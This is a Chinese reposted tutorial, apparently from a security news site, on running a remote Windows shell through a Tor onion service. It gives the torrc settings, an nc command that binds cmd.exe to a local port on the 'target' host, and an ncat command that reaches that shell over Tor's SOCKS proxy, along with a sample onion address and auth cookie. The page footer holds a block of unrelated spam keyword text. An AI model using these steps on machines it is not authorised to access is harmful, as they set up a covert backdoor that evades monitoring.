站長資訊網(wǎng)
        最全最豐富的資訊網(wǎng)站

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        首先,我們要在一個Windows Tor客戶端中創(chuàng)建一個Tor onion服務(wù)(即隱藏服務(wù))。我下載了Tor Expert bundle(同樣適用于Tor瀏覽器)-【下載地址】。

        然后使用下列命令創(chuàng)建Tor配置文件torrc:

        HiddenServiceDir C:demoTorservice HiddenServicePort 8662 127.0.0.1:12345

        開啟Tor服務(wù)之后,將會自動創(chuàng)建目錄C:demoTorService,并填充一系列必要的文件(<主機(jī)名>文件夾包含了這個Toronion服務(wù)的.onion地址)。

        該onion服務(wù)將監(jiān)聽端口8662,而流量將會直接轉(zhuǎn)發(fā)到127.0.0.1(端口12345)。

        這里我們還可以給服務(wù)開啟客戶端驗(yàn)證功能,因?yàn)槿绻婚_啟這個功能的話,任何知道這個.onion地址和端口號的人都可以進(jìn)行連接。最基礎(chǔ)的客戶端驗(yàn)證使用了共享密鑰,你可以使用下列命令進(jìn)行配置(torrc):

        HiddenServiceAuthorizeClient basic testuser

        這里我選擇使用testuser作為客戶端名稱:

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        接下來,我們可以使用配置文件torrc來開啟Tor:

        tor.exe -f torrc

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        .onion地址以及客戶端驗(yàn)證cookie可以在service目錄的<主機(jī)名>文件夾中找到:

        nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

        當(dāng)然了,你一定要保護(hù)認(rèn)證cookie密鑰的安全。

        現(xiàn)在,用nc.exe在目標(biāo)Windows設(shè)備上開啟服務(wù)(我?guī)啄昵熬驮陔娔X上下載了nc.exe,我不記得原始的URL地址了,我使用的版本是v1.11,MD5為ab41b1e2db77cebd9e2779110ee3915d):

        nc -e cmd.exe -L -s 127.0.0.1 -p 12345

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        Tor ExpertBundle以及nc.exe不需要任何其他的依賴組件(跟DLL類似),因此任意用戶都可以直接運(yùn)行。

        現(xiàn)在我們的目標(biāo)主機(jī)已經(jīng)配置好了,在另一臺設(shè)備上,我需要使用包含了認(rèn)證cookie的配置文件來開啟Tor服務(wù):

        HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        接下來,我們需要運(yùn)行ncat,因?yàn)閚cat.exe支持socks5代理(nc.exe不支持):

        ncat.exe –proxy 127.0.0.1:9050 –proxy-type socks5 nybjuivgocveiyeq.onion 8662

        接下來,我們就得到遠(yuǎn)程Shell啦!

        通過Tor Onion在Windows中執(zhí)行遠(yuǎn)程Shell可以嗎?

        提醒大家一下,這種方法不適用于ncat v 7.60版本,具體原因請參考【這里】:

        ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.

        * 參考來源:didierstevens,F(xiàn)B小編Alpha_h4ck編譯,轉(zhuǎn)載請注明來自FreeBuf.COM

        贊(0)
        分享到: 更多 (0)
        網(wǎng)站地圖   滬ICP備18035694號-2    滬公網(wǎng)安備31011702889846號
        主站蜘蛛池模板: 欧美一区二区精品系列在线观看| 四虎国产精品成人免费久久| 国产免费伦精品一区二区三区| 国产精品夜色一区二区三区| 国产精品女同久久久久电影院| 国产精品无码日韩欧| 久久se精品一区二区影院| 亚洲一级Av无码毛片久久精品 | 国内精品久久久久影院优| WWW国产精品内射老师| 国产精品久久久久久| 亚洲高清国产AV拍精品青青草原 | 久久香蕉国产线看观看精品yw| 精品国际久久久久999波多野| 久久久久99精品成人片三人毛片| 亚洲综合国产精品第一页| 国产一在线精品一区在线观看 | 国产精品男男视频一区二区三区| 国产亚洲精品自在线观看| 精品无人区麻豆乱码1区2区| 国亚洲欧美日韩精品| 2021国产精品视频网站| 日韩精品毛片| 精品日本一区二区三区在线观看| 911亚洲精品国内自产| 欧美巨大黑人精品videos| 精品无人区麻豆乱码1区2区| 国产精品一在线观看| 69久久夜色精品国产69| 国产精品成人A区在线观看| 精品熟女少妇av免费久久| 一区二区三区日韩精品| 四虎永久在线精品国产馆V视影院| 国产精品亚洲视频| 国产午夜精品一区二区| 精品第一国产综合精品蜜芽| 国产精品免费看久久久香蕉| 国产一区二区精品久久岳| 久久精品国产亚洲Aⅴ香蕉| 久热这里只有精品99国产6| 免费看一级毛片在线观看精品视频 |